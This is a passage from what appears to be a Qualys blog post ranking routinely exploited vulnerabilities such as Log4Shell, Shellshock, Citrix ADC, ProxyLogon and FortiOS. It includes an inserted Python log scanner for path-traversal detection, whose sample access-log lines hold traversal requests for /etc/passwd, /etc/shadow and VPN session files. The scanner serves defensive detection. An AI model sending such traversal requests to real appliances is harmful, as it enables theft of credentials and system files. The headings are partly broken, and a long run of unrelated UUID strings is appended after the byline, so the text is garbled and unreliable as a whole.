"Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-44228, or "Log4Shell," is a severe vulnerability in Apache's log4j Java library. The flaw exploits the 'lookups' feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. 
**CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash's processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. 
### 13. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**

**Vulnerability Trending Over Years: 2023 (8 times)**

It was exploited by 62 Malware and 50 Ransomware and was trending in the wild as recently as August 20, 2023.

**Qualys Vulnerability Detection (QID): 90870**

CVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight. A crafted Silverlight application can access memory unsafely, leading to the execution of arbitrary code in the security context of the current user.

If that user has administrative rights, the attacker can install programs, alter or delete data, or create new accounts with full privileges. The victim is typically lured to a malicious website, or to a link pointing at one, commonly through an email or instant message.

### 14. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**

**Vulnerability Trending Over Years: 2023 (10 times)**

It was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.

**Qualys Vulnerability Detection (QID): 119956**

CVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) that allows an untrusted Java applet to execute arbitrary code outside the Java sandbox. It originates from a flaw in the implementation of the AtomicReferenceArray class, and **it was exploited by the Flashback Trojan in 2012**, which produced one of the largest known malware outbreaks on Apple Mac computers. Attackers exploit it by tricking users into visiting a malicious website that hosts a Java applet.
### 15. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**

**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**

It was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.

**Qualys Vulnerability Detection (QID): 372305, 150273**

**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**

CVE-2019-19781, nicknamed "Shitrix," is a significant vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway. It allows unauthenticated attackers to execute arbitrary code on the appliance, which in turn gives them a foothold from which to reach internal network resources.

The flaw resides in the VPN component of the affected products: a directory traversal in the handling of request paths gives attackers both read and write access to the underlying file system, and that write access is what attackers used to turn the traversal into code execution.

### 16. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**

**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**

It was exploited by 29 Malware and 24 Threat Actors and was trending in the wild as recently as September 2, 2023.

**Qualys Vulnerability Detection (QID): 110310**

CVE-2018-0802 is a critical vulnerability in Microsoft Office and WordPad that allows remote code execution through specially crafted files. Like CVE-2017-11882 (No. 1 on this list), it lies in the Equation Editor component, and it surfaced as a bypass of the incomplete fix for that earlier flaw.

Attackers can run arbitrary code in the context of the current user and take over the system if that user holds administrative rights. The vulnerability was used in targeted attacks and was being actively exploited before Microsoft released the January 2018 security update that corrects how the component handles objects in memory.
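Items 9 and 15 above, like item 19 (CVE-2018-13379) further down this list, are all path traversals in SSL VPN web portals, and all three leave the traversal in the appliance's HTTP access log, provided the request target is normalized before it is matched. The Python below is an added example, not part of the Qualys post or any vendor's detection content. It percent-decodes repeatedly (double encoding defeats single-pass filters), resolves `..` segments in both the path and every query parameter value, distinguishes traversals that stay inside the web tree (which can still reach handlers the portal's authentication rules did not cover) from those that escape it, and flags resolved paths that hit a watch-list of files no unauthenticated client should receive. The log lines, paths and watch-list are constructed for illustration and are not the published proof-of-concept requests for any of these CVEs.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

_LOG = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3})')
# Illustrative watch-list of files an unauthenticated VPN client must never receive.
SENSITIVE_MARKERS = ("/etc/passwd", "/etc/shadow", "session", ".key", ".pem")
MAX_DECODE_ROUNDS = 3  # %252e%252e (double encoding) needs two passes; bound the loop


def decode_path(raw: str) -> str:
    """Percent-decode until stable, then unify separators; filters that decode once miss %252e."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw.replace("\\", "/")


def resolve(path: str) -> Tuple[bool, str]:
    """Walk the segments like a filesystem would; report whether '..' climbed above the root."""
    escaped = False
    stack: List[str] = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
        else:
            stack.append(segment)
    return escaped, "/" + "/".join(stack)


def analyze_target(target: str) -> List[Dict[str, object]]:
    """Inspect the request path and every query value for traversal segments."""
    path, _, query = target.partition("?")
    candidates = [("path", path)]
    for param in (query.split("&") if query else []):
        key, _, value = param.partition("=")
        candidates.append((f"param:{key}", value))

    findings = []
    for where, raw in candidates:
        decoded = decode_path(raw)
        if ".." not in decoded.split("/"):
            continue  # no traversal segment; dotted names such as jquery..min.js are fine
        escaped, resolved = resolve(decoded)
        findings.append({
            "where": where,
            "kind": "escapes-root" if escaped else "stays-in-tree",
            "resolved": resolved,
            "sensitive": any(marker in resolved for marker in SENSITIVE_MARKERS),
        })
    return findings


def scan_log(lines: List[str]) -> List[Tuple[int, List[Dict[str, object]]]]:
    """Return (line number, findings) for every log line that carries a traversal attempt."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _LOG.search(line)
        if match is None:
            continue
        findings = analyze_target(match.group("target"))
        if findings:
            hits.append((number, findings))
    return hits


# Constructed access-log lines; paths and file names are illustrative, not the
# published proof-of-concept requests for any CVE on this page.
SAMPLE_LOG = [
    '203.0.113.9 - - [08/Jan/2020:03:12:44 +0000] "GET /vpn/../vpns/cfg/portal.conf HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Jan/2020:03:12:45 +0000] "GET /portal/../../../../../../etc/passwd HTTP/1.1" 200 1433',
    '203.0.113.9 - - [08/Jan/2020:03:12:46 +0000] "GET /remote/login?lang=/../../../..//////////data/sslvpn_session HTTP/1.1" 200 8192',
    '203.0.113.9 - - [08/Jan/2020:03:12:47 +0000] "GET /portal/%252e%252e/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 403 0',
    '198.51.100.3 - - [08/Jan/2020:03:13:01 +0000] "GET /assets/jquery..min.js HTTP/1.1" 200 89476',
    '198.51.100.3 - - [08/Jan/2020:03:13:02 +0000] "GET /portal/login.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        for f in findings:
            print(f"line {number}: {f['where']:<11} {f['kind']:<14} sensitive={f['sensitive']} -> {f['resolved']}")
```

Two details matter in practice: a 200 response on a flagged line means the appliance served the file, so those lines are incident-response material rather than scanner noise, and a "stays-in-tree" traversal is still worth alerting on because it is exactly how a request reaches a handler that the portal's authentication rules did not anticipate.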
### 17. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**

**Vulnerability Trending Over Years: 2021, 2023 (46 times)**

It was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.

**Qualys Vulnerability Detection (QID): 50107, 50108**

**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**

CVE-2021-26855, the entry point of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that lets an unauthenticated attacker bypass authentication and impersonate users.

The flaw lets the attacker send arbitrary HTTP requests through the Exchange front end to back-end services, granting access to users' mailboxes and enabling information theft; chained with a post-authentication file-write bug (CVE-2021-27065) it yields remote code execution. It was widely exploited by multiple threat actors, which led Microsoft to release out-of-band emergency patches.

### 18. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**

**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)**

It was exploited by 10 Malware, 4 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 4, 2023.

**Qualys Vulnerability Detection (QID): 150267, 87386**

CVE-2019-2725 is a severe deserialization vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over the network without user interaction. It was quickly weaponized, initially to install cryptocurrency miners.

### 19. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**

**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)**

It was exploited by 6 Malware, 13 Threat Actors, and 6 Ransomware and was trending in the wild as recently as August 30, 2023.

**Qualys Vulnerability Detection (QID): 43702**

**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2018-13379 is a path traversal vulnerability in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files through specially crafted HTTP requests. The file most often targeted holds SSL VPN session data, including usernames and plaintext passwords, so the leak is typically the first step of a more serious intrusion.

### 20. **CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability**

**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**

It was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.

**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**

**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**

CVE-2021-26084 is a critical vulnerability in Atlassian Confluence Server and Data Center, specifically an OGNL (Object-Graph Navigation Language) injection in the Webwork component. An unauthenticated attacker can submit an OGNL expression that the server evaluates, executing arbitrary code on the Confluence instance and compromising its integrity.

## TruRisk Dashboard

Qualys VMDR gives organizations instant visibility into high-risk vulnerabilities, including the top twenty listed here.

[Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)

The **Qualys VMDR TruRisk Dashboard** gives complete visibility into open vulnerabilities, organized around your organization's global risk score and its high-risk vulnerabilities.
Once you have identified the vulnerable assets for these top twenty CVEs and assigned them to remediation owners, you can use Qualys Patch Management to reduce the risk immediately.

The TruRisk VMDR Dashboard is available here: [Download the Dashboard](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)

## Key Insights & Takeaways

 * In the current vulnerability threat landscape, identifying open vulnerabilities and remediating them effectively is the highest priority for every defender.
 * Among the vast number of published CVEs, you need to know which weaponized, high-risk vulnerabilities are actively targeted by threat actors, malware, and ransomware families.
 * Use multi-dimensional threat intelligence to prioritize vulnerabilities rather than running several siloed threat feeds side by side.
 * Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying prioritization.

## References

 * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)
 * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers' Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)

## Additional Contributors

 * **Shreya Salvi, Data Scientist, Qualys**
 * **Saeed Abbasi, Product Manager, Vulnerability Research**

Published September 4, 2023, on the Qualys blog by Ramesh Ramachandran.
"43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "46FA259E-5429-580C-B1D5-D1F09EB90023", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49EC151F-12F0-59CF-960C-25BD54F46680", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4AC49DB9-A784-561B-BF92-94209310B51B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F4AF4AC-0953-5098-98D6-592B918B0836", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", 
"54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5DB14853-1EDB-5A80-BD98-BB388CC80401", "5DD13827-3FCE-5166-806D-088441D41514", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "63C36F7A-5F99-5A79-B99F-260360AC237F", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "6787DC40-24C2-5626-B213-399038EFB0E9", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "69FAE88E-7F22-5ACC-B555-3441BE00C566", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", 
"6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "721C46F4-C390-5D23-B358-3D4B22959428", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "743571E7-B8EE-5E77-B047-E2E001379ACE", "74A4D09D-9483-5842-A44A-9DA17D085AF5", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F0B9E8-D173-5309-9826-5880F8B35043", "76F6F494-8855-5F94-9675-4474FFFA65A1", "7758268F-2004-536A-B51F-62DA1E5A992D", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", 
"7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7D82EDFA-5384-53C5-96AD-A99E88471129", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "84D5F04A-0DDB-5788-8759-DA99D303B756", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "939F3BE7-AF69-5351-BD56-12412FA184C5", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", 
"988A0BAB-669A-57AE-B432-564B2E378252", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9C9BD402-511C-597D-9864-647131FE6647", "9D09C8C3-35C2-51CD-B6E1-6542183770EF", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9E82678F-0559-56B2-94DC-6505FE64555C", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AB5B35BD-2A55-5B27-A126-0CF1A7E7B145", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B16D26DB-D60C-5C0C-9452-80112720B442", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", 
"B9A69678-D96F-528D-B436-366259B4A283", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "BFE641BE-701F-5AE0-A891-975C96EFFAF6", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C60B1B73-A009-5CE1-9D6C-3B66270812FD", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", 